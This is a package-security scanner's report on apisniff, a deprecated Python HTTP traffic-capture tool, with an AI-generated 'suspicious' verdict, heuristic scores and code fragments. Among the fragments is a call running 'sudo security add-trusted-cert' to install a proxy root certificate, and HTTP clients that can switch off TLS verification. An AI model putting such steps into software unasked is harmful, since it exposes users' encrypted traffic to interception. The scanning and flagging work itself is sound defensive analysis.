apisniff

v0.1.3 suspicious
7.0
High Risk

Deprecated Python package. apisniff has moved to Go; install via Homebrew.

🤖 AI Analysis

Final verdict: SUSPICIOUS

The package exhibits significant shell and obfuscation risks, suggesting potential malicious intent. Although there is no concrete evidence of credential harvesting, the combination of risks and the suspicious behavior of executing commands and manipulating system settings warrant caution.

  • Executing commands like 'security' and 'sudo'
  • Lack of SSL verification in network requests
Per-check LLM notes
  • Network: The use of async HTTP requests might be legitimate, but the lack of SSL verification is concerning and could indicate potential risks.
  • Shell: Executing commands like 'security' and 'sudo' suggests manipulation of system security settings which is highly suspicious and may imply unauthorized actions.
  • Obfuscation: The use of base64 decoding is common but could indicate an attempt to obscure code logic or hide sensitive information.
  • Credentials: No clear patterns indicating credential harvesting were detected, but further investigation into the package's functionality and context is recommended.
  • Metadata: The maintainer has only one package and the repository is not popular, which raises some suspicion.

📦 Package Quality Overall: Medium (5.2/10)

✦ High Test Suite 9.0

Test suite present — 27 test file(s) found

  • Test runner config found: conftest.py
  • Test runner config found: pyproject.toml
  • 27 test file(s) detected (e.g. conftest.py)
◈ Medium Documentation 5.0

Some documentation present

  • Detailed PyPI description (6163 chars)
○ Low Contributing Guide 2.0

No contributing guide or governance files found

  • No CONTRIBUTING, CODE_OF_CONDUCT, or governance files found
◈ Medium Type Annotations 5.0

Partial type annotation coverage

  • 254 type-annotated function signatures detected in source
◈ Medium Multiple Contributors 5.0

Limited contributor diversity

  • 1 unique contributor(s) across 100 commits in 4LAU/apisniff
  • Single author but highly active (100 commits)

🔬 Heuristic Checks

Outbound Network Calls score 4.5

Found 3 network call pattern(s)

  • ) try: async with httpx.AsyncClient( follow_redirects=True, timeout=_TIM
  • try: async with httpx.AsyncClient( timeout=_TIMEOUT, verify=no
  • : try: async with httpx.AsyncClient( timeout=_TIMEOUT, verify=not insecure, proxy=pr
Code Obfuscation score 8.0

Found 4 obfuscation pattern(s)

  • req_body = ( base64.b64decode(d["request_body"]) if d.get("request_body") else b""
  • resp_body = ( base64.b64decode(d["response_body"]) if d.get("response_body") else b""
  • try: return base64.b64decode(text) except Exception: return text.enco
  • resp_body: bytes = base64.b64decode(resp_body_text) except Exception:
Shell / Subprocess Execution score 8.0

Found 4 shell execution pattern(s)

  • N_KEYCHAIN): result = subprocess.run( ["security", "find-certificate", "-c", "mitmpro
  • r password.\n") result = subprocess.run([ "sudo", "security", "add-trusted-cert", "-d", "-r"
  • apture.\n") proxy_proc = subprocess.Popen( cmd, env=env, stdout=subprocess.DEVNULL, stderr=sub
  • ry: chrome_proc = subprocess.Popen( chrome_cmd, stdout=subproce
Credential Harvesting

No credential harvesting patterns detected

Typosquatting

No typosquatting candidates detected

Registered Email Domain

No author email provided

Suspicious Page Links

All external links appear legitimate

Git Repository History score 2.5

Git history flags: Repository has zero stars and zero forks

  • Repository has zero stars and zero forks
Maintainer History score 2.0

1 maintainer concern(s) found

  • Author "Aaron Lau" appears to have only 1 package on PyPI (new or inactive account)
Known CVE Vulnerabilities

No known vulnerabilities found in OSV database.

💡 AI App Starter Prompt

Use this prompt to build a project with apisniff 
Create a network traffic analysis tool using the 'apisniff' Python package. Although 'apisniff' is deprecated and now available in Go, we will focus on its core functionalities as described in its documentation. Your task is to develop a simple yet powerful utility that monitors HTTP requests and responses within a local network segment. This tool should capture and display essential details such as the URL, method type (GET, POST, etc.), headers, and response status codes. Additionally, implement a feature to filter captured data based on specific keywords in URLs or headers, allowing users to quickly identify and analyze relevant traffic. Finally, ensure your application logs all captured data into a structured file format for later review and analysis.

💬 Discussion Feed

Leave a comment

No discussion yet. Be the first to share your thoughts!